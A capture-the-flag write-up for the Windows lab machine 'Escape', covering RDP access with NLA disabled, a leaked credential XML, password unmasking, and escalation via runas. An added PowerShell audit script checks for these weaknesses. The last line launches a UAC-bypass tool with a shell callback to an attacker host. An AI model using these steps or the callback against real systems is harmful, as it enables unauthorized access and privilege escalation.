
Machine (Easy) - Escape

Writeup for the Escape machine, an easy Windows challenge involving RDP password discovery and privilege escalation.

Writeup Author: BobBuilder


Objective: Gain initial access through a leaked RDP password stored in a local XML file, then escalate to Administrator using runas or a UAC bypass.

Category: Machine
Difficulty: Easy
Platform: Windows
Machine Author: xct & kozie


User

Remote Access (NLA Disabled)

We connect to the target using RDP with Network Level Authentication disabled:

xfreerdp /v:<escape_ip> -sec-nla

This opens a remote desktop session without requiring initial credentials.

Credential Discovery via Local File Access

From the RDP session, open Microsoft Edge and browse to:

file:///C:/_admin/profiles.xml

The XML file reveals stored RDP credentials:

<Profile>
  <ProfileName>admin</ProfileName>
  <UserName>127.0.0.1</UserName>
  <Password><REDACTED></Password>
  <Secure>False</Secure>
</Profile>

Decrypting the Password

Using BulletsPassView from NirSoft, we reveal the plaintext behind the masked password field in the GUI that loads this profile:

admin : <REDACTED>

This gives us valid credentials for local admin login.
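As an added defender-side check (not from the writeup and not code by its author): a PowerShell audit that confirms NLA is enforced on RDP and searches for profile XML files that store a password with Secure set to False. Assumptions: the standard RDP-Tcp registry values UserAuthentication and SecurityLayer, the <Profile> layout shown above, and C:\_admin (the path from the writeup) as the default search root.

```powershell
# Added audit script, not part of the original writeup. Assumptions: the
# standard RDP-Tcp registry location for the NLA setting, and profile XML
# files laid out like the <Profile> shown above. Run elevated on the host.

function Test-RdpNlaRequired {
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
    $p = Get-ItemProperty -Path $key -Name UserAuthentication, SecurityLayer
    # UserAuthentication 1 = NLA required (a -sec-nla connection is then refused);
    # SecurityLayer 2 = TLS enforced instead of legacy RDP security.
    [pscustomobject]@{
        NlaRequired = ($p.UserAuthentication -eq 1)
        TlsEnforced = ($p.SecurityLayer -eq 2)
    }
}

function Find-PlaintextRdpProfiles {
    param(
        # C:\_admin is the path from the writeup; add user profile dirs as needed.
        [string[]]$SearchRoot = @('C:\_admin'),
        [string]$Filter = '*.xml'
    )
    Get-ChildItem -Path $SearchRoot -Filter $Filter -Recurse -File -ErrorAction SilentlyContinue |
    ForEach-Object {
        $file = $_.FullName
        try { [xml]$doc = Get-Content -LiteralPath $file -Raw -ErrorAction Stop }
        catch { return }   # not well-formed XML: skip this file
        foreach ($prof in $doc.SelectNodes('//Profile')) {
            # PowerShell exposes child elements as properties; missing ones are $null.
            $pw = $prof.Password
            if ($pw -and $pw -ne '' -and $prof.Secure -eq 'False') {
                [pscustomobject]@{
                    File        = $file
                    ProfileName = $prof.ProfileName
                    UserName    = $prof.UserName
                    # Report only the length; the secret itself must not land in a ticket.
                    PasswordLen = ([string]$pw).Length
                }
            }
        }
    }
}

Test-RdpNlaRequired
Find-PlaintextRdpProfiles | Format-Table -AutoSize
```

A profile reported here, or NlaRequired returning False, reproduces exactly the two conditions the initial-access steps above rely on.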


Root

Privilege Escalation via runas

Standard runas:

runas /user:admin cmd

or

runas /user:Escape\admin cmd

Elevated prompt via PowerShell

Start-Process cmd.exe -verb runas

UAC bypass + callback using custom tool

To drop us into an Administrator shell:

.\runas.exe user pass -r <attacker_ip>:<port> cmd --bypass-uac